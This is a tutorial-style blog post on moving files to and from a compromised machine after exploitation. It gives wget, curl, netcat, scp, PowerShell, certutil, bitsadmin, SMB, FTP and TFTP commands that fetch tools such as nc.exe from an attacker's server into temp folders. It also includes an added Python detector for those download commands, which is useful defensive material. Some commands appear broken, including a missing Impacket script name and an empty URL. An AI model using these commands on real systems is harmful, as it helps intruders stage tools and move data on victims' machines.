File Transfer is one of the most crucial aspects of post-exploitation. You will need to move files, exploits, or tools between the victim's machine and your machine. You need to know various methods of transferring files depending on the OS and tools available on the system. Some of them are below:

This post assumes you are running Linux as a host machine.



If the target machine has wget or curl installed, the easiest way to transfer files is through HTTP. You need to start an HTTP server on your host machine in the directory which contains the file you want to transfer.

# Setup http server in Host machine: 
## Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## php
php -S 0.0.0.0:8080

## Apache
### For this, you need to copy the file you want to transfer to the directory '/var/www/html' then enable apache service
service apache2 start
Host Setup

Now you can download the files on the target machine as follows.

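# Port 8080 matches the Python/PHP servers above; omit the port for Apache (port 80)
wget http://<your_hosts_ip>:8080/<file_name>
curl http://<your_hosts_ip>:8080/<file_name> > file
curl -O http://<your_hosts_ip>:8080/<file_name>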
Download Script


If netcat is installed on the target machine, we can use it to transfer files.

# First, set up the netcat on target machine to listen for the incoming request.
nc -nvlp 8080 > file

# then send the desired file from your host machine
nc $target_ip 8080 < file
Netcat File Transfer


If you have SSH access to the target machine, you can transfer files using SCP as follows:

## Copy the file: 
scp /path/to/source/file.ext username@<target_ip>:/path/to/destination/file.ext

## Copy Directory:
scp -r /path/to/source/dir username@<target_ip>:/path/to/destination
SCP File Transfer



Even though Windows doesn't have wget, we can use other options to download files via HTTP. Some of them are:


powershell Invoke-WebRequest -Uri http://[vpnIP]:[LPORT2]/Message.exe -Outfile Message.exe

powershell -NoLogo -Command "$webClient = new-object System.Net.WebClient; $webClient.DownloadFile('', '%temp%\evil.exe')"

powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.x/nc.exe','c:\temp\nc.exe')

powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.x/nc.exe" -Destination "C:\temp\nc.exe")

powershell.exe wget "http://10.10.14.x/nc.exe" -outfile "c:\temp\nc.exe"
Powershell File Transfer


certutil.exe -urlcache -split -f http://<host_ip>:<port>/file file
Certutil File Transfer


bitsadmin /transfer evil /download /priority high http://<host_ip>:<port>/file %temp%\file
Bitsadmin File Transfer
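
From the defender's side, the Windows download commands above leave recognizable process command lines. The following is an added example (not part of the original post) that flags them in process-creation logs; the rule names, host names and sample command lines are constructed for illustration.

```python
import re

# Added example: patterns for the download one-liners listed above, matched
# against process-creation command lines (Sysmon Event ID 1 / Security 4688).
RULES = {  # rule names are hypothetical labels chosen for this example
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://", re.I),
    "bitsadmin_transfer": re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b.*https?://", re.I),
    "ps_webclient": re.compile(r"\bpowershell(\.exe)?\b.*net\.webclient.*\.download(file|string)\b", re.I),
    "ps_web_cmdlet": re.compile(
        r"\bpowershell(\.exe)?\b.*\b(invoke-webrequest|iwr|wget|curl|start-bitstransfer)\b.*https?://", re.I),
}

# Writing into temp or other user-writable locations raises the priority.
DROP_PATH = re.compile(r"(%temp%|\\temp\\|\\appdata\\|\\users\\public\\)", re.I)


def classify(cmdline):
    """Return (matched rule names, severity) for one command line."""
    hits = sorted(name for name, rx in RULES.items() if rx.search(cmdline))
    if not hits:
        return [], "none"
    return hits, "high" if DROP_PATH.search(cmdline) else "medium"


# Constructed sample events (host, command line); not taken from a real log.
SAMPLE_EVENTS = [
    ("WS01", r"certutil.exe -urlcache -split -f http://192.0.2.10:8080/file file"),
    ("WS01", r"bitsadmin /transfer job1 /download /priority high http://192.0.2.10:8080/file C:\Users\Public\file"),
    ("WS02", r"powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://192.0.2.10/nc.exe','c:\temp\nc.exe')"),
    ("WS02", r'powershell.exe wget "http://192.0.2.10/nc.exe" -outfile "c:\temp\nc.exe"'),
    ("WS03", r"certutil.exe -hashfile C:\Windows\System32\notepad.exe SHA256"),
    ("WS03", r"powershell.exe Get-ChildItem C:\temp"),
]


def triage(events):
    """Return alerts as (host, rules, severity), skipping benign command lines."""
    alerts = []
    for host, cmdline in events:
        rules, severity = classify(cmdline)
        if rules:
            alerts.append((host, rules, severity))
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

Command-line matching misses renamed binaries and obfuscated arguments, so pair it with proxy or DNS logs for the same hosts.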


The easiest method to transfer files between Linux and Windows is SMB, since it doesn't require any special configuration or commands and SMB is built into every Windows machine. You can also execute any binary from an SMB share without needing to copy it over to the target machine.

First, start an SMB share on your host machine.

python3 /usr/share/doc/python3-impacket/examples/ evilshare .
The directory containing the script may differ from mine depending on your Impacket installation.

You can test whether the SMB share is up using the net view command on Windows.

net view \\<host_ip>

Now you can copy files from the share to the target machine using copy or move, and vice versa.

## In target machine download the file using copy
copy \\ip-addr\share-name\file out-file
## to transfer file from target machine to local machine
copy file_name \\ip-addr\share-name
SMB File Transfer

Or you can execute the binary directly from the share without copying.



FTP is another method as handy as SMB as it's also built-in on Windows. However, it will only work if you have an interactive shell where you can use the FTP prompt to issue commands. If you don't have an interactive shell, you will need to create a file containing the command and feed it to FTP.

Install a Python library called pyftpdlib.

sudo apt-get install python3-pyftpdlib

Start an FTP server with:

python3 -m pyftpdlib

# By default, the ftp server runs on port 2121 and accepts anonymous authentication
# you can specify the ports using -p argument
# you can also give write access to anonymous user with -w 
FTP Server Setup

If you have an interactive shell, you can just log into the FTP server with ftp <host_ip> <port> and use the credentials anonymous. If you don't have an interactive shell, create a text file with the following content. The two anonymous lines answer the username and password prompts. Remove the binary line if the file you want to transfer is not binary.

open <host_ip> <port>
anonymous
anonymous
binary
get binary_name.exe
bye
FTP Login

Now, simply run ftp -s:filename.txt, and it will download the file you specified.


TFTP is similar to FTP, but it isn't installed natively on newer versions of Windows. If it is available (you can also enable it with pkgmgr /iu:"TFTP") on the target machine, you can start a TFTP server on your machine with:

service atftpd start

and get files from the target machine with:

tftp -i <host_ip> GET binary.exe
These are the most popular methods of post-exploit file transfer on Windows and Linux! Catch you in the next one.